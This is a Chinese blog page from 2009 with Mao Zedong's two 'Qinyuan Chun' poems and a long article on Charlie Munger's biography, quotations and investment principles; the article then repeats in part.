2009年8月16日星期日

毛泽东草书《沁园春》二首

沁园春·长沙(1925年)

  独立寒秋, 湘江北去, 橘子洲头。 看万山红遍,层林尽染; 漫江碧透,百舸争流。鹰击长空,鱼翔浅底,万类霜天竞自由。怅寥廓,问苍茫大地, 谁主沉浮?

  携来百侣曾游,忆往昔, 峥嵘岁月稠。 恰同学少年,风华正茂; 书生意气,挥斥方遒。指点江山,激扬文字,粪土当年万户侯。曾记否,到中流击水,浪遏飞舟?

沁园春·雪(1936年)

  北国风光,千里冰封,万里雪飘。望长城内外,惟馀莽莽;大河上下,顿失滔滔。山舞银蛇,原驰蜡象,欲与天公试比高。须晴日,看红妆素裹,分外妖娆。

  江山如此多娇,引无数英雄竞折腰。惜秦皇汉武,略输文采;唐宗宋祖,稍逊风骚。一代天骄,成吉思汗,只识弯弓射大雕。俱往矣,数风流人物,还看今朝。

巴菲特最亲密的战友——查理.芒格的投资智

查理.芒格是当代投资大师,巴菲特长达45年的合伙人,伯克夏尔.哈萨维公司第二号人物。巴菲特曾认为是芒格将其从格雷厄姆的理论中拯救出来。
查理芒格早年就有过人天赋,大学时代,曾在三个不同的大学以不同的专业进行学习,包括:数学、物理学、自然和工程学,热力学和气象学。有趣的是,芒格最终没有在这三所大学拿到学士学位,而最终是在哈佛法学院,拿到了学士学位。在毕业时,芒格是哈佛法学院300多名学生中成绩最好的12名之一。
在1964年,查理芒格在投资房地产上赚到第一桶金:140万美元。在1962年,查理芒格也成立了自己的公司:惠勒.芒格公司(也同样是私下亲友募集的基金)。在1962年-1972年的11年间,合伙公司年均复合收益率达到28.3%的惊人回报,且仅有1970年出现过-0.1%的亏损。这使得查理芒格声名显著,同时在此期间,也认识了巴菲特。
但随着美国股市在70年代陷入狂热,查理芒格和巴菲特在投资上的天赋似乎出现了差距:1969年巴菲特痛下决心解散了全部合伙公司,并且忍耐了好几年市场的巨大泡沫,但也因此逃脱了1973年-1974年的全球股市灾难。查理芒格的合伙公司,却没有幸免,1973年-1974年,连续两年出现接近31%的亏损,这也将芒格合伙公司前11年差不多一半多的盈利抹掉了。所幸的是芒格抗住了压力,坚持持股不动,终于在1975年迎来75%的盈利反弹,也将14年的年均复利改写为19.8%。
经历过过山车般的查理芒格,看着过往16年没有一年亏损,且复利大幅超越自己的巴菲特,查理芒格认识到自己没有必要单独进行投资,于是他也在1975年清算了自己的合伙公司,并将自己的资金和巴菲特一起投入到了伯克夏尔公司。
当然,后面芒格也不甘寂寞,自己担任了wesco金融公司主席(伯克夏尔持有该公司超过80%股权),于是每年我们能听到类似巴菲特年报的查理芒格演讲纪录。
下面摘录部分精华片断:
一、查理.芒格的性格、印象
查理芒格对子女的要求很苛刻,例如他的继子威廉曾说过一个小故事:他有天和一个朋友开车去湖边,然后乘坐游艇玩耍。威廉不小心在船上把他朋友的车钥匙掉到了湖里。回到家芒格非常固执的要求儿子回去湖里把钥匙找回来。结果威廉在湖里面潜了2个多小时才把钥匙从湖底下捞出来。
芒格平时喜欢阅读,对象非常广泛,从遗传学,到凯恩斯的学术文章,到建筑学,再到哲学和传记。他儿子回忆说,芒格每天工作很晚,回家吃完饭就开始研究标准普尔,然后和巴菲特通电话。平时开车时,也常常陷入沉思,对周边发生的事情都忽视掉了。巴菲特也多次强调,芒格有种特性,就是精神的高度集中。但在其他人眼里,似乎他总是对生活有些马虎大意。
巴菲特曾讲过一个有趣的故事:他和芒格参加了所罗门公司的董事会后,在纽约大道上两人热烈的讨论着,巴菲特突然发现自己身边一个人都没有,而芒格一个人打的去了机场,然后飞回了公司,没有道别,什么都没有。
查理.芒格曾说过一句话,可以作为他性格的一个注解:"找到你最擅长的,然后集中精力不断努力"。
二、芒格的语录
其实查理.芒格的精彩语录非常多,而且比起巴菲特平淡学究式的言语,芒格的语录中充满了幽默和放荡不羁,例如芒格就曾将价值投资比喻为"赌博"。
以下是几个摘录:
我们的经历往往证实了一个长期坚信的观点,即时刻准备着在人生中的一些时刻马上采取大规模行动,通过做些简单而合理的事情,我们经常会大幅提高人生财富。
一些清晰可辨的巨大机会通常会出现在那些不断寻找和等待,并有着热衷于判断多种变量的充满好奇心的人面前。之后就是要求你当赔率非常有利的时候愿意大举押注,你所使用的资源就是审慎和耐心。
我们的游戏规则就是当机会出现时,认出潜力巨大的投资标的,这种机会不常出现,机会总是留给那些有准备的人。
我们的投资纪律就是等待一个可以放手一博的机会。
2006年芒格对华尔街的各种金融衍生品这么评述:"把对美国的衍生品的说明看成一条下水道的说法,是对下水道的侮辱!"
在企业界,如果你拥有分析师,进行了尽职调查且不具备普通常识,你所描述的这一切就像是地狱!
三、多学科思维模型(格棚原则)
芒格说:大多数人习惯于在一个学科或者模型下思考问题,例如经济学,这和一句老话:"对于拿着大锤的人而言,世界就像一枚钉子",这是非常不明智的方法。
芒格说的这个多学科模型,似乎过于玄妙,例如他认为他至少有100种思维模型,包括重要的如:工程学的亢余系统模型、物理学的断裂点/颠覆力矩模型、生物学的现代达尔文合论模型、心理学的认知误判模型等。
我的理解,芒格将对象公司放入了一个变化的世界中,将其作为一个流动的要素去考察它本身以及在整个社会经济系统中的关系。而且将自己的观察结论也放入这个变化的体系中去考察。有些类似索罗斯笔下的社会学下的"测不准"原则:测量结果也会影响到测量方法。
例如对零售行业企业的考察,可能涉及到心理学的范畴(事实上已经演变出消费心理学专业),对一家企业的考察可能需要涉及到很多方面的学科知识,这在查理芒格之外,还找不到第二个对此有深刻认识的人。
但对我们而言,这部分思想太过于玄妙,只能从很多芒格实际的分析案例中寻找答案:例如对可口可乐的心理依赖性研究等。
四、芒格的投资评估过程
芒格说:"首先将一只股票看成是对这家企业的所有权,根据竞争优势来判断这家企业的持久度,寻找那些比你所支付的价格更高的贴现未来现金流价值。只有当你拥有优势时,才能采取行动,这是最基本的方法。你必须了解赔率,只有当赔率有利于你的时候才下注。之后我们只需保持低调,并尽可能不受顺境或逆境的影响,几年之后就会有收获。"
芒格认为,投资必须快速剔掉自己无能为力的部分,然后将精力全部集中于"简单且可以理解的投资标的"。芒格将投资对象分为三类:可以投资、不能投资、太难理解的投资。根据能力范围,将部分股票直接剔除,例如IPO股票、科技、医药等。(但同时芒格也强调学习能力,这使得伯克夏尔公司近年也投资了法国一家大型制药公司,之前伯克夏尔极少碰医药公司股票)。剩下的,再经过芒格的多学科思维模型进行过滤,直到剩下最后的对象。
芒格认为,必须全面的分析和观察公司的所有关联因素:劳动力状态、供应商客户关系、技术变革的冲击、竞争优势和弱点、定价能力、环境问题、库存和现金、资本开支、无形资产状态,包括商誉、分销渠道、社会责任感、产品等等,以及这些因素的可持续性。
归根到底,芒格就是在寻找企业的"护城河",但芒格非常强调仔细考虑长期可能让这家公司陷入四面楚歌的"竞争力崩溃"因素。
最后部分才是整个评估过程的终极目标:比较(你所得)价值和你所支付的价格。但和格雷厄姆不同,芒格认为,一家价格公平的伟大企业好于价格高高在上的好企业。
芒格和巴菲特的演进,主要表现在两个方面:并不是以价格大幅低估作为选择投资对象的首要条件,而是首先强调自己可把握的,有较大概率成为伟大企业的公司。其次,并不过于强调对公司实体资产的考量,而是更多考虑自由的现金流情况以及没有计算在内的"商誉"(即护城河)。
注意到一点,芒格认为,后续仍需要对当初判断的因素进行考察,因为所有因素都有可能发生变化。而且,最终这样的评估过程并不是"数学计算",而是哲学分析,通过这样的分析和人生经历以及认知技能结合,最终形成一种"感觉"。
即便选择出这样的公司,芒格认为仍不急于买入,而是等待所谓的"触发按钮前的清单",这些因素在"千钧一发"的机会出现时,会大规模建仓,而不是小规模的试探。
注意到,巴菲特在早年,例如1974年买华盛顿邮报时,采取的也是小规模建仓,逢低加仓的做法,但到了后期,芒格已经建议放弃这样的行为,因为这么做也意味着自己对选择的对象缺乏信心(不确定性)。这部分应该客观对待。
五、查理芒格的投资原则清单(摘录主要原则)
1、风险——所有的投资评估必须首先从风险开始,尤其是声誉风险
2、独立——"只有在童话故事中,国王才会被告知自己其实是赤身裸体的"
3、准备——获胜的唯一途径就是工作工作再工作,并希望获得一些洞察力
4、明智的谦虚——承认自己的无知能让人更有智慧
5、严格分析——使用科学的方法和有效的清单能将错误和遗漏降低至最低
6、配置——合理配置资本是投资者的首要任务
7、耐心——克制人类对行动的偏好
8、果断——当适当的情形出现时,果断且深信不疑的采取行动
9、改变——与改变共存并接受不可消除的复杂性
10、专注——让事情保持简单,记住你要做什么
芒格在投资原则中,还有很多精彩和耐人寻味的论断,摘录精彩论断:
1、坚持给假定的风险提供适当的补偿
2、避免犯大错误,避免资本金持续亏损
3、要做到客观和理智,必须进行独立思考
4、记住这一点,即你正确以否与别人是否认同你无关,唯一能决定你正确以否的是你的的分析和判断是否正确。
5、模仿多数人的做法会导致均数回归
6、通过大量阅读,让自己成为一生的自学者,培育求知欲望,努力让自己一天比一天聪明
7、如果你想变得更聪明,那就一直问自己:"为什么,为什么,为什么"
8、明智的谦虚是识别不确定的证据,抵挡对得出错误的准确性、确定性的渴望,更重要的是永远不要欺骗自己,记住自己是最容易被欺骗的。
9、最好记住显而易见的东西,而不是那些深奥难懂的。
10、要成为商业分析师,而不是市场分析师、宏观经济分析师或者证券分析师。
11、进行前后思维——总是反过来看事物
12、金点子非常少——如果赔率对你非常有利,就下重注
13、避免不必要的交易税和摩擦成本,永远不要根据自己的兴趣采取行动
14、享受投资的过程吧,因为你就生活在这个过程中
15、机会是留给有准备的人,这就是股票的游戏规则
16、认识并适应你周围世界的真实本质,不要寄希望于世界会适应你
17、认清现实,即使你不喜欢现实——尤其是你不喜欢它的时候
18、避免狂妄自大和厌倦效应
芒格认为,有些人的个性天生就不适合投资,他们要么过于焦躁,要么缺乏耐心。只有当你具有较好的个性(主要是指你非常有耐心),拥有了足够的知识后,势必进行大规模进攻,然后就会慢慢学会游戏规则,部分通过实践,部分通过学习别人的经验。显而易见,你能从别人那儿获得的启发越多,你的情况就会越好。
六、查理芒格论投资
1、性格、耐心和求知欲
应当说一下,为避免在焦躁中拥有股票而需要磨练性情,但是单独依靠个性是无法取得投资成功的,你需要在很长的时间内拥有非常强烈的求知欲。长此以往,这种性情能逐步提高你关注现实的能力,如果你不具备这样的性格,注定会失败,即便你拥有很高的智商。
2、多样化投资
过度多样化投资的想法真的很疯狂。我从不相信四处出击的多元化投资能带来优秀的回报。回头看我们做出的前15大决策,你会发现我们获得了平均的回报,不需要太多活动,只要有耐心就可以了,你应该严守自己的规则,在机会来临的时候全力出击,过去伯克夏尔就是通过押注那些肯定要发生的事情而赚钱的(注意芒格的措辞很多和赌博有关)
3、价值投资和长期投资
当你因为某项东西的价值低估而买入,在价格接近你认为的内在价值时抛出,这太难了!
4、伯克夏尔的投资失误
错误有两种:第一种是什么都不做,沃伦称为"舔大拇指",第二种是没有足额购买应该大量购买的东西。伯克夏尔因为错失的机会成本高达几十亿美元,例如我们因为股价大涨错失了沃尔玛,一个价值上百亿美元的失误。
5、能力范围及其界限
你所要做的,就是找到自己的能力范围,然后专注于这些领域。如果你拥有了能力,就应该知道自己的界限,如果你不知道自己的能力界限,那你就根本没有拥有能力。
但投资的游戏规则,就是不断学习,例如沃伦(巴菲特)学了很多,扩大了他的能力范围,所以才能够对诸如中国石油等公司进行投资。
七、次贷危机前查理.芒格对金融机构和金融衍生品的警告
我们对那些使用财务杠杆的金融公司尤其担心(银行也属于使用财务杠杆较大的金融公司),如果他们开始讨论自己在控制风险上做得如何出色,这会让我们感到紧张。我们比其他人更早感到焦躁不安,每当出现这样的焦躁情绪,我们就会把钱放在桌子上(芒格意为清仓),你只能适应这种做法。
衍生品是个非常不负责任的系统,这个系统过于复杂,你无法相信数万亿美元参与其中,你无法相信它有多复杂,你也无法相信有多么大的动机会让人对价值和清算能力产生一厢情愿的想法。
一开始人们只是试图对冲利率带来的风险(本身这就是非常复杂困难的),之后对冲操作让(公布的盈利)出现了波动,他们又发明新的工具来消除这些波动,此时你已经陷入了谎言之中,很多大企业都出现这样的情况。
衍生品有很多条款,例如一方的信用被调低,信用被调低的一方必须提供更多的抵押品,你可能因此破产(如果使用了足够的财务杠杆),但当公司伸手去拿(对方的抵押品)的时候,钱并不在那里,为了保护自己,他们引入了不稳定因素,似乎没有人意识到他们发明的系统会带来灾难,这是一个疯狂的系统!
芒格说:我极其憎恨GAAP(公认会计准则)应用于衍生品和掉期和约中,摩根大通利用了这个会计准则,我认为它应该为此感到丢人。这些模型创造了奇怪的衍生品,结果这些会计盈利都不是真实的盈利,当你希望拿到真金白银的时候,它就消失了,这些钱根本就没有存在过。
对衍生品的说明真是一桩让人作呕的差事,它就像一条下水道,如果我是正确的,届时将会有严厉的惩罚在等待它,你所要做的,就是准备当这些衍生品崩溃时该怎么办?
我们试图卖掉GEN
RE(通用再保险)公司的衍生品业务,但没有成功。我可以信心十足的预测,大型银行无法按照账面价值清算这个国家的多数衍生品。我不知道这些衍生品何时走向灭亡以及情况会变得多糟糕,但我担心最终的结局会非常可怕。
如果未来5-10年内没有出现与衍生品有关的崩盘,我将会感到不可思议。我认为我们是美国唯一一家可以逃脱衍生品影响的大公司,对于伯克夏尔而言,从事这样的业务是一种疯狂的想法,对大银行而言,这是一项疯狂的业务。
其实在塞斯.卡拉曼的《安全边际》中,也曾对美国金融衍生品提出过严重的批评和质疑,对于严肃的价值投资者而言,似乎总是能从这些谎言的(趋势)中识别,并且脱身而出。
从这些文章可以看出,查理.芒格有过人的眼光和一针见血的洞察力,这些可能就是他独有的天赋吧。
八、规模效应、特许经营权、行业竞争格局
查理.芒格在1994年南加州大学商学院的一次讲演中,阐述了对规模效应、特许经营权等一系列问题。
芒格用几何学来阐述规模效应:如果你铸造一个铁圆形池,随着体积增大,单位面积的铁就能构成更大体积。这就是所谓的"规模效应"。芒格举例电视广告,他说:在早期,仅有三个有线电视网覆盖了90%的人群,电视广告风靡。如果你是宝洁公司,尽管广告费用巨大,但它财大气粗,通过一个广告就能甩掉大量的瓶瓶罐罐。而那些小公司,却因为产品销量少而无法轻易使用广告。直到后来广告的普及,才使这些小公司也有机会出头。
芒格认为,规模优势还与信息竞争优势相伴而行。例如在一个偏远的地方,看到箭牌口香糖和格洛茨口香糖放在一起,一个标价40美分,一个30美分,你会为了10美分把从没听说过的品牌塞进嘴巴吗?箭牌受惠于其知名度,就具备了规模优势,也就是信息竞争优势。
芒格指出,规模效应在心理学上还有个渊源,就是"社交证明"(social
proof),因为人总是有意无意受到其他人喜好和行为的影响。如果人们都簇拥去买同一个东西,我们就通常会认为它质量更好,于是也亦步亦趋。
又例如报业,除了一些超级大城市,美国每个城市都只剩下一家日报。当这家日报拥有很大的发行量,也就意味着有很大量的广告。一旦两者结合起来,哪个读者还愿意看那些薄薄的,信息量少的报纸?所以,这就是阶梯式的"赢者通吃",也是规模效应的一种。
在中国,也有很多这样的例子:例如腾迅,当一个及时通讯工具拥有了几亿个客户,就形成了网络累积效应:正是更多的客户吸引了新的的客户加入。而后进者,则非常难撼动先发者的优势地位。又如中国移动,累计了4亿多移动客户后,真正优质的客户,并不太愿意随时改变自己的服务商和号码,而通过这些客户,又能不断吸引新的客户。又如阿里巴巴和淘宝网,当你在这个网上能找到足够多的信息,那客户为什么还要花费力气去其他网络呢。
芒格同时指出,规模效应可能造就行业占据绝对优势的少数大公司,但并非无懈可击。他说:并不总是越大越好,大规模的弊病就是官僚主义。在这样的情况下,内部的激励机制会失效。例如早期的AT&T(美国电话电报公司),在那样的垄断大公司下工作,谁还会在乎股东的利益?你的工作从你的文件篮(IN-BASKET)转到别人的文件篮中,你就以为已经解决问题了。所以它逐步演变成臃肿、麻木的官僚机构。
所以生活就是两种力量的无止境对抗——一方面取得规模效应的优势,一方面就是踩着美国农业部的脚后跟行事(芒格认为美国农业部没干几件有用的事,却忙得不亦乐乎)。
和规模效应相对的,是"专业化"。例如大而全的《星期六晚邮报》曾经显赫一时,但现在已经不在了。芒格幽默的说:我们手边都是《越野摩托》这样的杂志,他们的读者都是喜欢在比赛时开着摩托车翻跟头的傻瓜,但他们非常热衷于此。这本杂志的利润率说出来会令你垂涎三尺。
芒格在分析规模效应时,特别提到连锁店。他说:说到规模效应,连锁店值得一提。连锁店具有巨大的规模效应。例如沃尔玛,在面对零售巨人西尔斯.罗巴克(西斯连锁百货公司)时,他们在城市的郊区一步步打败小的供应商,直到最后开始进军城市区,去毁灭"大人物"。占尽优势的西尔斯百货公司却在长期的优势下逐步陷入官僚化,在这样的体系下,如果你有新点子,保不准会成为这个系统的敌人(既得利益者阻碍了创新和变革)。
芒格又提到了行业的竞争格局。他指出,尽管最终不少市场沦为少数公司的天下,但不同行业的竞争结果却是截然不同的:例如航空业,几乎没有公司能最终从这个市场上赚到钱。而例如麦片公司,几乎所有的制造公司都能赚到可观的利润。又如碳酸饮料的两个巨头:可口可乐和百事可乐,非常稳定的赚取利润。
芒格说的,即寡头垄断竞争格局下的"囚徒困境":少数(特别是行业只剩下两个巨头)寡头竞争时,似乎表面竞争激烈,实际上都在试图维持一个"平衡",主动进攻者可能会导致激烈的反击使得两败俱伤。
所以,我们对某些行业仅剩余两家寡头的垄断竞争行业,需要格外注意:这些公司的经营业绩可能会非常稳定。例如乳制品行业(现在由于行业激变,情况更复杂)、家电零售行业、原来的电信运营行业等等。
另外,芒格指出:很多人根本不能区分,哪些是可能害死你的科技,哪些会有益,而巴菲特这个家伙却非常明白。
芒格讲了一个精彩的小故事:有一天,有个人跑去跟巴菲特说:有人发明了一种新的织布机,效率可能是我们机器的两倍。巴菲特听了后跟芒格说:伙计,我希望这不是真的,否则我们就要关门大吉了。
芒格理解他的原意是:纺织业是个竞争过度的行业,改进机器会促使商品生产率大幅提升,但好处只会落在客户身上,而厂家捞不到一点好处。
而相反,芒格说:如果你在奥什科什拥有唯一一家报社,有人发明了更有效率的排版术,你使用这种技术,花费的成本都会从客户那儿系数返还。
芒格的意思很明确:只有对于具有垄断优势的企业,科技的提升才能将带来的成本降低效果留在公司。
九、有效市场理论、错位赌注、格雷厄姆等
芒格认为,有效市场理论大体上是正确的,对于一个聪明的,循规蹈矩的选股人来说,市场是非常有效的,要战胜市场相当困难。但别忘了这个世界的"铁律":只有20%的人才能跻身前15%(二八效应)。
芒格将股市,比作"赛马中的彩池投注系统":每个人都来下注,赔率根据赌资变化。尽管一个傻瓜也能看出一匹记录辉煌、步履轻快的赛马获胜概率高,但别忘了前者的赔率是3:2,而一匹记录糟糕的马赔率是100:1。股价也是如此,所以战胜系统非常艰难。
更糟糕的是,赛马场主要收取17%的赌资作为佣金,于是不幸的是,一个聪明的,研究颇深的赛马者,也仅能努力将亏损降为10%(因为有17%的佣金)。无论如何,很少人能在交纳17%佣金后还能持续赢得比赛的。
但芒格说到:我曾碰到过在这个游戏中能活得滋润的人。这些人将赛马作为自己的职业,但他们只是在看到一些实用的,价格偏离的赌注时,才偶尔下注。
尽管人类并不是生来就具备通晓才能的,但上天赐给那些孜孜不倦的人一项才能——他们在观察并寻找世界上错价的赌注,机会不太多,但偶尔会有一个。既然上天赐给良机,聪明的人就会重金下注,但其他时候,却始终按兵不动。
芒格认为在投资领域,和赛马赌博投注上,并没有太大区别。他说:对我来说,赢家必须有选择性的下注,这个道理显而易见,我很早就明白了这个道理,但我不明白,为什么对许多人来说却如此难以参透。
芒格批评了所谓的"板块轮转":一个让很多人着迷的技法就是"板块轮转",你在心中推测石油股价超越零售股的时间表,然后满场转悠,往市场最热门的板块中钻,以为长此以往,你就能作出比别人更高明的决策,跑在市场的前面。也许真有这样的人,但我认识的那些有钱人,没有一个人是靠这个发了财的。
芒格又批评了格雷厄姆,他说:格雷厄姆使用的方法,我和沃伦都喜欢,但格雷厄姆方法在那个年代(30年代)适用,现在而言,如果一家企业陷入危机,资产负债表上的东西也会随之消失。而且你无法完全撇开员工,将公司营运资本打包带走。而且,目前类似格雷厄姆标准的"廉价股"也都消失了。
但,芒格还是对格雷厄姆提出的"市场先生"系统赞不绝口,他说:将市场剥离出来,作为一个每天都可能给你机会的人,这一点对巴菲特建立自己的体系太重要了。
芒格指出,格雷厄姆很少谈及管理,他总是认为,管理中的信息常常被扭曲,容易误导大众。但芒格认为,正是能辨认出一些公司管理的优势和内在动能,才能使得自己对于一些高出账面价值2-3倍的公司做出更好的判断:它们仍可能是被低估的。
芒格又提到一个非常重要的观点:从长期来说,一只股票的回报率跟企业发展是环环相扣的,如果一家企业40年来的盈利一直是它资本的6%,那在长期持有40年后,你的年均收益率不会和6%有什么区别——即便你当初买的时候检的便宜货。如果该企业在20-30年间盈利都是资本的18%(芒格指的ROE),即便你当初出价过高,回报依然会令你满意!芒格这个判断得到过西格尔教授的数据支持,即便在1973年泡沫最高峰买入漂亮50股票的人,在20年后依然能超越市场,取得不错的回报。但,这并不成为"任何价位下都可以买入伟大公司"的理由。
芒格在文中,对"成长股"的进入时机,进行了阐述:一种方法是在他们成长的时候就慧眼识珠,瞄准进入,例如在山姆沃尔顿将沃尔玛上市的时候。如果你很年轻,这样做乐趣多多。但对于伯克夏尔这样的巨型公司,这个方法并不奏效。但芒格认为,在他们成长的时候就慧眼识珠,是一种明智的方式,只是他自己没有这么做而已。(这和巴菲特的原意不符,巴菲特曾对投资IPO的公司说了很多否定的看法,但芒格提倡可以尝试)
芒格在后文中提到一家公司:国际香精香料公司,认为这个公司是他所知道的唯一一家对自己的产品设置版权或专利权的公司(原文如此,应该远不止),他们为其他公司设计专利产品的香味——例如刮胡泡沫的香料。而这样的淡雅的香味,对促进消费具有重要意义。这让我马上想到了香港上市的华宝国际,非常值得研究。

巴菲特最亲密的战友——查理.芒格的投资智
查理.芒格是当代投资大师,巴菲特长达45年的合伙人,伯克夏尔.哈萨维公司第二号人物。巴菲特曾认为是芒格将其从格雷厄姆的理论中拯救出来。
查理芒格早年就有过人天赋,大学时代,曾在三个不同的大学以不同的专业进行学习,包括:数学、物理学、自然和工程学,热力学和气象学。有趣的是,芒格最终没有在这三所大学拿到学士学位,而最终是在哈佛法学院,拿到了学士学位。在毕业时,芒格是哈佛法学院300多名学生中成绩最好的12名之一。
在1964年,查理芒格在投资房地产上赚到第一桶金:140万美元。在1962年,查理芒格也成立了自己的公司:惠勒.芒格公司(也同样是私下亲友募集的基金)。在1962年-1972年的11年间,合伙公司年均复合收益率达到28.3%的惊人回报,且仅有1970年出现过-0.1%的亏损。这使得查理芒格声名显著,同时在此期间,也认识了巴菲特。
但随着美国股市在70年代陷入狂热,查理芒格和巴菲特在投资上的天赋似乎出现了差距:1969年巴菲特痛下决心解散了全部合伙公司,并且忍耐了好几年市场的巨大泡沫,但也因此逃脱了1973年-1974年的全球股市灾难。查理芒格的合伙公司,却没有幸免,1973年-1974年,连续两年出现接近31%的亏损,这也将芒格合伙公司前11年差不多一半多的盈利抹掉了。所幸的是芒格抗住了压力,坚持持股不动,终于在1975年迎来75%的盈利反弹,也将14年的年均复利改写为19.8%。
经历过过山车般的查理芒格,看着过往16年没有一年亏损,且复利大幅超越自己的巴菲特,查理芒格认识到自己没有必要单独进行投资,于是他也在1975年清算了自己的合伙公司,并将自己的资金和巴菲特一起投入到了伯克夏尔公司。
当然,后面芒格也不甘寂寞,自己担任了wesco金融公司主席(伯克夏尔持有该公司超过80%股权),于是每年我们能听到类似巴菲特年报的查理芒格演讲纪录。
下面摘录部分精华片断:
一、查理.芒格的性格、印象
查理芒格对子女的要求很苛刻,例如他的继子威廉曾说过一个小故事:他有天和一个朋友开车去湖边,然后乘坐游艇玩耍。威廉不小心在船上把他朋友的车钥匙掉到了湖里。回到家芒格非常固执的要求儿子回去湖里把钥匙找回来。结果威廉在湖里面潜了2个多小时才把钥匙从湖底下捞出来。
芒格平时喜欢阅读,对象非常广泛,从遗传学,到凯恩斯的学术文章,到建筑学,再到哲学和传记。他儿子回忆说,芒格每天工作很晚,回家吃完饭就开始研究标准普尔,然后和巴菲特通电话。平时开车时,也常常陷入沉思,对周边发生的事情都忽视掉了。巴菲特也多次强调,芒格有种特性,就是精神的高度集中。但在其他人眼里,似乎他总是对生活有些马虎大意。
巴菲特曾讲过一个有趣的故事:他和芒格参加了所罗门公司的董事会后,在纽约大道上两人热烈的讨论着,巴菲特突然发现自己身边一个人都没有,而芒格一个人打的去了机场,然后飞回了公司,没有道别,什么都没有。
查理.芒格曾说过一句话,可以作为他性格的一个注解:"找到你最擅长的,然后集中精力不断努力"。
二、芒格的语录
其实查理.芒格的精彩语录非常多,而且比起巴菲特平淡学究式的言语,芒格的语录中充满了幽默和放荡不羁,例如芒格就曾将价值投资比喻为"赌博"。
以下是几个摘录:
我们的经历往往证实了一个长期坚信的观点,即时刻准备着在人生中的一些时刻马上采取大规模行动,通过做些简单而合理的事情,我们经常会大幅提高人生财富。
一些清晰可辨的巨大机会通常会出现在那些不断寻找和等待,并有着热衷于判断多种变量的充满好奇心的人面前。之后就是要求你当赔率非常有利的时候愿意大举押注,你所使用的资源就是审慎和耐心。
我们的游戏规则就是当机会出现时,认出潜力巨大的投资标的,这种机会不常出现,机会总是留给那些有准备的人。
我们的投资纪律就是等待一个可以放手一博的机会。
2006年芒格对华尔街的各种金融衍生品这么评述:"把对美国的衍生品的说明看成一条下水道的说法,是对下水道的侮辱!"
在企业界,如果你拥有分析师,进行了尽职调查且不具备普通常识,你所描述的这一切就像是地狱!
三、多学科思维模型(格棚原则)
芒格说:大多数人习惯于在一个学科或者模型下思考问题,例如经济学,这和一句老话:"对于拿着大锤的人而言,世界就像一枚钉子",这是非常不明智的方法。
芒格说的这个多学科模型,似乎过于玄妙,例如他认为他至少有100种思维模型,包括重要的如:工程学的亢余系统模型、物理学的断裂点/颠覆力矩模型、生物学的现代达尔文合论模型、心理学的认知误判模型等。
我的理解,芒格将对象公司放入了一个变化的世界中,将其作为一个流动的要素去考察它本身以及在整个社会经济系统中的关系。而且将自己的观察结论也放入这个变化的体系中去考察。有些类似索罗斯笔下的社会学下的"测不准"原则:测量结果也会影响到测量方法。
例如对零售行业企业的考察,可能涉及到心理学的范畴(事实上已经演变出消费心理学专业),对一家企业的考察可能需要涉及到很多方面的学科知识,这在查理芒格之外,还找不到第二个对此有深刻认识的人。
但对我们而言,这部分思想太过于玄妙,只能从很多芒格实际的分析案例中寻找答案:例如对可口可乐的心理依赖性研究等。
四、芒格的投资评估过程
芒格说:"首先将一只股票看成是对这家企业的所有权,根据竞争优势来判断这家企业的持久度,寻找那些比你所支付的价格更高的贴现未来现金流价值。只有当你拥有优势时,才能采取行动,这是最基本的方法。你必须了解赔率,只有当赔率有利于你的时候才下注。之后我们只需保持低调,并尽可能不受顺境或逆境的影响,几年之后就会有收获。"
芒格认为,投资必须快速剔掉自己无能为力的部分,然后将精力全部集中于"简单且可以理解的投资标的"。芒格将投资对象分为三类:可以投资、不能投资、太难理解的投资。根据能力范围,将部分股票直接剔除,例如IPO股票、科技、医药等。(但同时芒格也强调学习能力,这使得伯克夏尔公司近年也投资了法国一家大型制药公司,之前伯克夏尔极少碰医药公司股票)。剩下的,再经过芒格的多学科思维模型进行过滤,直到剩下最后的对象。
芒格认为,必须全面的分析和观察公司的所有关联因素:劳动力状态、供应商客户关系、技术变革的冲击、竞争优势和弱点、定价能力、环境问题、库存和现金、资本开支、无形资产状态,包括商誉、分销渠道、社会责任感、产品等等,以及这些因素的可持续性。
归根到底,芒格就是在寻找企业的"护城河",但芒格非常强调仔细考虑长期可能让这家公司陷入四面楚歌的"竞争力崩溃"因素。
最后部分才是整个评估过程的终极目标:比较(你所得)价值和你所支付的价格。但和格雷厄姆不同,芒格认为,一家价格公平的伟大企业好于价格高高在上的好企业。
芒格和巴菲特的演进,主要表现在两个方面:并不是以价格大幅低估作为选择投资对象的首要条件,而是首先强调自己可把握的,有较大概率成为伟大企业的公司。其次,并不过于强调对公司实体资产的考量,而是更多考虑自由的现金流情况以及没有计算在内的"商誉"(即护城河)。
注意到一点,芒格认为,后续仍需要对当初判断的因素进行考察,因为所有因素都有可能发生变化。而且,最终这样的评估过程并不是"数学计算",而是哲学分析,通过这样的分析和人生经历以及认知技能结合,最终形成一种"感觉"。
即便选择出这样的公司,芒格认为仍不急于买入,而是等待所谓的"触发按钮前的清单",这些因素在"千钧一发"的机会出现时,会大规模建仓,而不是小规模的试探。
注意到,巴菲特在早年,例如1974年买华盛顿邮报时,采取的也是小规模建仓,逢低加仓的做法,但到了后期,芒格已经建议放弃这样的行为,因为这么做也意味着自己对选择的对象缺乏信心(不确定性)。这部分应该客观对待。
五、查理芒格的投资原则清单(摘录主要原则)
1、风险——所有的投资评估必须首先从风险开始,尤其是声誉风险
2、独立——"只有在童话故事中,国王才会被告知自己其实是赤身裸体的"
3、准备——获胜的唯一途径就是工作工作再工作,并希望获得一些洞察力
4、明智的谦虚——承认自己的无知能让人更有智慧
5、严格分析——使用科学的方法和有效的清单能将错误和遗漏降低至最低
6、配置——合理配置资本是投资者的首要任务
7、耐心——克制人类对行动的偏好
8、果断——当适当的情形出现时,果断且深信不疑的采取行动
9、改变——与改变共存并接受不可消除的复杂性
10、专注——让事情保持简单,记住你要做什么
芒格在投资原则中,还有很多精彩和耐人寻味的论断,摘录精彩论断:
1、坚持给假定的风险提供适当的补偿
2、避免犯大错误,避免资本金持续亏损
3、要做到客观和理智,必须进行独立思考
4、记住这一点,即你正确以否与别人是否认同你无关,唯一能决定你正确以否的是你的的分析和判断是否正确。
5、模仿多数人的做法会导致均数回归
6、通过大量阅读,让自己成为一生的自学者,培育求知欲望,努力让自己一天比一天聪明
7、如果你想变得更聪明,那就一直问自己:"为什么,为什么,为什么"
8、明智的谦虚是识别不确定的证据,抵挡对得出错误的准确性、确定性的渴望,更重要的是永远不要欺骗自己,记住自己是最容易被欺骗的。
9、最好记住显而易见的东西,而不是那些深奥难懂的。
10、要成为商业分析师,而不是市场分析师、宏观经济分析师或者证券分析师。
11、进行前后思维——总是反过来看事物
